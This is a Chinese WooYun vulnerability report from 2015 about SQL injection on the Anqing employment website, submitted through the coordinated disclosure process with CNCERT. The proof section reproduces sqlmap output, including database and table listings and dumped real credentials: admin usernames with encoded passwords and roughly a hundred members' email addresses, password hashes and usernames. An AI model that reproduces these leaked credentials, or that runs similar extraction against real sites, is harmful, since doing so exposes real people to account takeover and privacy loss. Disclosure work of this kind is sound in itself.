漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106042
漏洞标题:安徽安庆就业网存在MySQL注入+直接暴库
相关厂商:cncert国家互联网应急中心
漏洞作者: 泪雨无魂
提交时间:2015-04-08 14:54
修复时间:2015-05-25 18:38
公开时间:2015-05-25 18:38
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-08: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开
简要描述:
安徽安庆就业网存在高危SQL注入漏洞,是PHP的网站,phpMyAdmin 2.11.6 通过此注入漏洞,可以爆出数据库的所有数据 包括管理员账号密码 和好多的就业信息 学生就业信息和工作人员的就业信息 等等。。。。。。。
泄露了该市的就业信息网的重要信息。。。。。。。。。
还暴露出了phpMyAdmin 的后台地址。。。。。。。。
还有一点就是该市就业网站已被挂上博彩的页面 影响很大啊。。。。。。
详细说明:
http://www.aqjyw.gov.cn
安徽安庆就业网存在高危SQL注入漏洞,是PHP的网站,phpMyAdmin 2.11.6 通过此注入漏洞,可以爆出数据库的所有数据 包括管理员账号密码 和好多的就业信息 学生就业信息和工作人员的就业信息 等等。。。。。。。
泄露了该市的就业信息网的重要信息。。。。。。。。。
还暴露出了phpMyAdmin 的后台地址。。。。。。。。
<img src="https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201504
/051732441d11422bf76606a5a7392351064d7a4d.png" alt="2.png" />
漏洞证明:
证明的话看图吧。。。。。
再贴一些数据出来吧
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[16:37:19] [INFO] fetching database names
[16:37:19] [INFO] the SQL query used returns 2 entries
[16:37:20] [INFO] retrieved: "information_schema"
[16:37:20] [INFO] retrieved: "aqjywdb"
available databases [2]:
[*] aqjywdb
[*] information_schema
Database: aqjywdb
[31 tables]
+-------------------+
| web_ads |
| web_ads_ty |
| web_author |
| web_branch |
| web_cytj |
| web_impart |
| web_infomation |
| web_infomation_ty |
| web_inter |
| web_inter_ty |
| web_jianli |
| web_link |
| web_link_ty |
| web_log |
| web_member |
| web_member_gs |
| web_member_lm |
| web_menu |
| web_message |
| web_post |
| web_resume |
| web_source |
| web_tj |
| web_tjs |
| web_topic |
| web_topic_info |
| web_topic_ty |
| web_user |
| web_user_priv |
| web_vod |
| web_vod_ty |
+-------------------+
Database: aqjywdb
Table: web_user
[15 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| Branch | smallint(4) |
| Cname | varchar(50) |
| Email | varchar(50) |
| Id | mediumint(9) |
| Info | varchar(255) |
| Lasttime | datetime |
| Logincount | int(10) unsigned |
| MyMenu | text |
| Online | tinyint(1) unsigned |
| Password | varchar(40) |
| Priv | smallint(3) |
| Sex | char(2) |
| Tel | varchar(50) |
| Uname | varchar(60) |
| Username | varchar(40) |
+------------+---------------------+
Database: aqjywdb
Table: web_user
[22 entries]
+----------+----------------------+
| Username | Password |
+----------+----------------------+
| admin | 0e081a0d0b06 |
| dgq | 1b180e4e4d4c |
| hnx | 1711074e4d4c |
| zjzx1 | 051505074d4f4e4e |
| zjzx2 | 051505074d |
| wzq | 08050e4e4d4c |
| pxzx1 | 0f0705074e4d4c |
| qsx | 0e0c074e4d4c |
| wjx | 0815074e4d4c |
| tcs | 0b1c0c4e4d4c |
| zyx | 0506074e4d4c |
| ssx | 0c0c074e4d4c |
| thx | 0b17074e4d4c |
| yxx | 0607074e4d4c |
| zxm | 4b4e464f4f4f |
| lijie | 120a051615161a |
| wln | 0813114a4a4e464a4f49 |
| sbj | 0c1d154e4d4c |
| yxq | 06070e4e4d4c |
| yjq | 06150e4e4d4c |
| kfq | 14190e4e4d4c |
| jyk | 1506144e4d4c |
+----------+----------------------+
info@ishang.net","admin"
---
[17:21:30] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[17:21:30] [INFO] fetching columns 'Email, Password, Username' for table 'web_member' in database 'aqjywdb'
[17:21:31] [INFO] the SQL query used returns 3 entries
[17:21:32] [INFO] retrieved: "Username","varchar(40)"
[17:21:32] [INFO] retrieved: "Password","varchar(40)"
[17:21:32] [INFO] retrieved: "Email","varchar(50)"
[17:21:32] [INFO] fetching entries of column(s) 'Email, Password, Username' for table 'web_member' in database 'aqjywdb'
[17:21:32] [INFO] the SQL query used returns 2923 entries
[17:21:34] [INFO] retrieved: "admin545@qq.com","1e1b1216114a4b4a","admin545"
[17:21:35] [INFO] retrieved: "ganggang@qq.com","181e1118181e1118","ganggang"
[17:21:35] [INFO] retrieved: "username999@qq.com","0a0c1a0d111e121a464646","username...
[17:21:36] [INFO] retrieved: "admin100@qq.com","1e1b1216114e4f4f","admin100"
[17:21:37] [INFO] retrieved: "admin999@qq.com","1e1b121611464646","admin999"
[17:21:38] [INFO] retrieved: "admin888@qq.com","1e1b121611474747","admin888"
[17:21:38] [INFO] retrieved: "ourdainpan@qq.com","100a0d1b1e16110f1e11","ourdainpan"
[17:21:38] [INFO] retrieved: "jiulala@qq.com","15160a131e131e3f0e0e511c1012","jiulala"
[17:21:39] [INFO] retrieved: "usanammsdf@qq.com","0a0c1e111e12120c1b193f0e0e511c1012...
[17:21:39] [INFO] retrieved: "myabc1111@qq.com","12061e1d1c4e4e4e4e3f0e0e511c1012","...
[17:21:40] [INFO] retrieved: "admin777@qq.com","1e1b121611484848","admin777"
[17:21:40] [INFO] retrieved: "uuuuanbc@qq.com","0a0a0a0a1e111d1c3f0e0e511c1012","uuu...
[17:21:41] [INFO] retrieved: "236882052@qq.com","4e46474c4f474f4e","yangli"
[17:21:41] [INFO] retrieved: "dsgewocdghtaonmyyi10@126.com","391c4e4d4c4b4a47","tnt"
[17:21:42] [INFO] retrieved: "ourdianpan@qq.com","100a0d1b161e110f1e11","ourdianpan"
[17:21:44] [INFO] retrieved: "xjl123456@qq.com","4e4d4c4b4a494847","xjl123456"
[17:21:44] [INFO] retrieved: "123456677@qq.com","4e4d4c4b4a494847","ourhappy"
[17:21:44] [INFO] retrieved: "sdfdsfdsf@qq.com","4e4d4c4b4a494847","houpay"
[17:21:44] [INFO] retrieved: "ewrwer@qq.com","4e4d4c4b4a494847","qwerty"
[17:21:44] [INFO] retrieved: "sdfsdfsd@qq.com","4e4d4c4b4a494847","donghuchun"
[17:21:45] [INFO] retrieved: "215487@qq.com","4e4d4c4b4a494847","65498711"
[17:21:47] [INFO] retrieved: "dgtxq24508@sohu.com","494c4d47484f4d4b","dgtxq24508"
[17:21:47] [INFO] retrieved: "ahaqweihong@163.com","1e0e081a1617101118","weihong"
[17:21:47] [INFO] retrieved: "wyj@ahyxkj.cn","4e46484c4e4f4e4d","zhmiss"
[17:21:47] [INFO] retrieved: "wuxua@126.com","080a47474e4d474e49","wuxu"
[17:21:47] [INFO] retrieved: "test@sina.com","4e4d4c4b4a494847","test1"
[17:21:49] [INFO] retrieved: "81259180@qq.com","4e4d4c4b4a494847","test2"
[17:21:50] [INFO] retrieved: "11@sina.com","4e4d4c4b4a494847","test3"
[17:21:50] [INFO] retrieved: "zc138@163.com","05171e101c17164e464748","zhaochi"
[17:21:50] [INFO] retrieved: "lyb790205@yeah.net","13061d48464f4d4f4a","lyb790205"
[17:21:50] [INFO] retrieved: "wuxu1@163.com","4c4d4e494a4b4e4d","wuxu32231"
[17:21:51] [INFO] retrieved: "jyj@163.com","4e4d4c4b4a494847","jyj"
[17:21:51] [INFO] retrieved: "1255698421@qq.com","4e4d4c4b4a494847","abdfsdkfjsdkfjd...
[17:21:51] [INFO] retrieved: "819370266@qq.com","4e4d4c4b4a494847","sang"
[17:21:51] [INFO] retrieved: "gg8668@126.com","4749494747494947","gg8668"
[17:21:52] [INFO] retrieved: "sang@126.com","0e1e05080c071a1b1c","qweasd"
[17:21:54] [INFO] retrieved: "yy@yy.yy","4e4c4f4a4c4f4b4c4e","yy@yy.yy"
[17:21:54] [INFO] retrieved: "zjq@163.com","05170a1516110e16101118","zhu"
[17:21:54] [INFO] retrieved: "lenovohts@163.com","4e4e4f080f4e4d4f","lenovohts"
[17:21:54] [INFO] retrieved: "liuyuyu116@163.com","494e4e4a4d4e3f3f","Daniela99"
[17:21:54] [INFO] retrieved: "wx@126.com","080a47474e4d474e49","sohueyou11"
[17:21:55] [INFO] retrieved: "wanghuafashion@163.com","48494e4f4d4c494d4c","wh172143"
[17:21:55] [INFO] retrieved: "15286543@qq.com","4e4d4c4b4a494847","jhfjhf"
[17:21:55] [INFO] retrieved: "915284205@qq.com","4c1d1e100516061a0f1a1118","colinmag...
[17:21:55] [INFO] retrieved: "13966732416@126.com","4e4648464f4d4f4a","19790205"
[17:21:55] [INFO] retrieved: "aqqw7@yahoo.cn","4a4b4f4d4f4b4f4b","wang5424"
[17:21:55] [INFO] retrieved: "840301190@qq.com","4a4c4e464d4b4f1e","fengzhongdeshi"
[17:21:57] [INFO] retrieved: "www.thq81@126.com","0e0e0b170e514e46474e","fengjingyiren"
[17:21:57] [INFO] retrieved: "x_xia@126.com","4b474946474a4d4e4f4e4d4c4b","x_xia"
[17:21:57] [INFO] retrieved: "14363091@qq.com","4a4a4a4c4848464e4d4c","14363091@qq.com"
[17:21:57] [INFO] retrieved: "396290478@qq.com","140a1147464f474f4d","kunshuang"
[17:21:57] [INFO] retrieved: "zijiaolan@126.com","08071547484f4a4e4b","wxj520"
[17:21:58] [INFO] retrieved: "609195872@qq.com","4e4c474949494d4a4f484d","13866625072"
[17:21:58] [INFO] retrieved: "sjx7566@163.com","0c15074e4d4c4b4a49484746","six123456...
[17:21:59] [INFO] retrieved: "beetobacoo@163.com","081e1118171e104a4a4a474f4749","be...
[17:21:59] [INFO] retrieved: "1073456910@qq.com","05194e4c4649494b4e47494748","aqchu...
[17:22:00] [INFO] retrieved: "成彬1538918186@qq.com","1c1d49474f4b4e47","13966979832"
[17:22:01] [INFO] retrieved: "505645496@qq.com","1e0e15144f474f4a","aqyy1020"
[17:22:02] [INFO] retrieved: "yaoyan2009@sohu.com","4e4a4d4f4e494f464e48","yaoyan"
[17:22:03] [INFO] retrieved: "yanhongch@126.com","4e4c4f464a4a4949494f4c","HT"
[17:22:04] [INFO] retrieved: "liuyun0556@126.com","4f4a4a494a4a4d47484c47","liuyun19...
[17:22:04] [INFO] retrieved: "abc540227230@qq.com","4c4b4f474f4c171e10","540227230"
[17:22:05] [INFO] retrieved: "aqingjack@163.com","4f4f4c4e484c4746","aqingjack"
[17:22:05] [INFO] retrieved: "dh5210@126.com","4e4c46494946464a4a4e4b","dh5210"
[17:22:06] [INFO] retrieved: "770813863@qq.com","08071b474c4f54191e11184d4e4b","wang...
[17:22:07] [INFO] retrieved: "1362907481@qq.com","4e4647474e4e4e481115","n79710"
[17:22:08] [INFO] retrieved: "317903060@qq.com","081e1c124e4c4e4b2323232323232323232...
[17:22:09] [INFO] retrieved: "wp520xy@sohu.com","080a4a4a4949474a47","wupeng9443"
[17:22:09] [INFO] retrieved: "chen@foxmail.com","4e46494b4f484d4c","13515562789"
[17:22:10] [INFO] retrieved: "923525902@qq.com","4a4c4d464f4e4f191c07","FangKuaiJi"
[17:22:10] [INFO] retrieved: "2465041249@qq.com","060a1c171e104e4e4c49","yuchao1137"
[17:22:10] [INFO] retrieved: "274529600@qq.com","4e4d4c4b4b4c4d4e","kunshuang11"
[17:22:11] [INFO] retrieved: "603617078@qq.com","4b4a494c4d4e484746","13865109978"
[17:22:13] [INFO] retrieved: "303010880@qq.com","4e46474d4e4f4e48","303010880"
[17:22:13] [INFO] retrieved: "wangjingpo9718@sina.com","48474f4d4f4e4d4e4c","wjb4556...
[17:22:13] [INFO] retrieved: "360196169@qq.com","474d4b49464f4e1b081b08","18956902322"
[17:22:14] [INFO] retrieved: "hualee34111234@yahoo.com.cn","1e0c1b4e4d4c1e0c1b","hua...
[17:22:15] [INFO] retrieved: "fansty@163.com","474e484a4d4e1c05","leehoosin"
[17:22:17] [INFO] retrieved: "chilemaa@163.com","4a4d4f4e4c4e4b282e","chilemaa@163.com"
[17:22:17] [INFO] retrieved: "641810595@qq.com","4e4649464f4e4e4b","lxq0114"
[17:22:18] [INFO] retrieved: "1234546@qq.com","4e4d4c4b4a494847","lamp"
[17:22:18] [INFO] retrieved: "452906891@qq.com","4e464747484d4f46372d","HRCancer"
[17:22:18] [INFO] retrieved: "309283792@163.com","4e46494f4f484d47","309283792@163.com"
[17:22:19] [INFO] retrieved: "909005163@qq.com","08174e4647484e4f4e4c","909005163@qq...
[17:22:19] [INFO] retrieved: "370308703@qq.com","4e4c4749494f4a4d4a4a48","hukai678"
[17:22:19] [INFO] retrieved: "1015883480@qq.com","0815174e46484f4e4e4f48","wsgly2008"
[17:22:20] [INFO] retrieved: "949046404@qq.com","1e0e4a4c4e4b4d474c1014","949046404@...
[17:22:20] [INFO] retrieved: "aqxd123123@126.com","1e0e1514071b464a4e4d4f4f","aqxd"
[17:22:21] [INFO] retrieved: "316912393@qq.com","4a4a4c4a4f4b4a1b1906","316912393"
[17:22:22] [INFO] retrieved: "zll529159183@qq.com","4e4b484d4a474c4946","zll529159183"
[17:22:23] [INFO] retrieved: "loveyou94ak@sin.com","4e4c464949494c4b4f464a","loveyou...
[17:22:23] [INFO] retrieved: "f7f7f78@shou.com","05071c091d4b4a49","qwertyu789"
[17:22:24] [INFO] retrieved: "364659622@qq.com","4949464e484f4f46","13966917009"
[17:22:25] [INFO] retrieved: "020wyj@163.com","4f4a4a49484a4a4b464949","020WYJ"
[17:22:27] [INFO] retrieved: "510051279@qq.com","0616110e1611184e4d4c4b4a49","187261...
[17:22:27] [INFO] retrieved: "huang0_0yong@yahoo.cn","170647464f4a4e49","huang0_0yong"
[17:22:28] [INFO] retrieved: "38867438@qq.com","4e46474d4e46474d","slj1982"
[17:22:28] [INFO] retrieved: "1319243967@qq.com","4e4c4e464d4b4c464948","1319243967"
[17:22:29] [INFO] retrieved: "1518110016@qq.com","0606064e4d4c4b4a49484746","1327570...
[17:22:30] [INFO] retrieved: "49800418@qq.com","4e4648464a49080c1211080f0c","yuexiao...
[17:22:31] [INFO] retrieved: "978224837@qq.com","474e4a464d464c4b4b4d","978224837@qq...
[17:22:32] [INFO] retrieved: "wuzhenruyu@163.com","08050d49494846494f49494846494f","...
[17:22:32] [INFO] retrieved: "tzj20081017@163.com","0b0515474b4f464e4d","tzj279130684"
[17:22:32] [INFO] retrieved: "jjuan_001@163.com","05170a061615161e1118150a1e11","jju...
[17:22:33] [INFO] retrieved: "18655674686@wo.com.cn","151611171e160f161118494d494747...
[17:22:34] [INFO] retrieved: "jaejong123@gmail.com","381a0d121e1106531d1e13131e1c14"...
[17:22:34] [INFO] retrieved: "63865797@qq.com","4e4647494f494e4d","yaoyuan"
修复方案:
你懂的。。。。。
数据的话我已经删除了。。。。。。。
版权声明:转载请注明来源 泪雨无魂@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-04-10 18:36
厂商回复:
已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置
最新状态:
暂无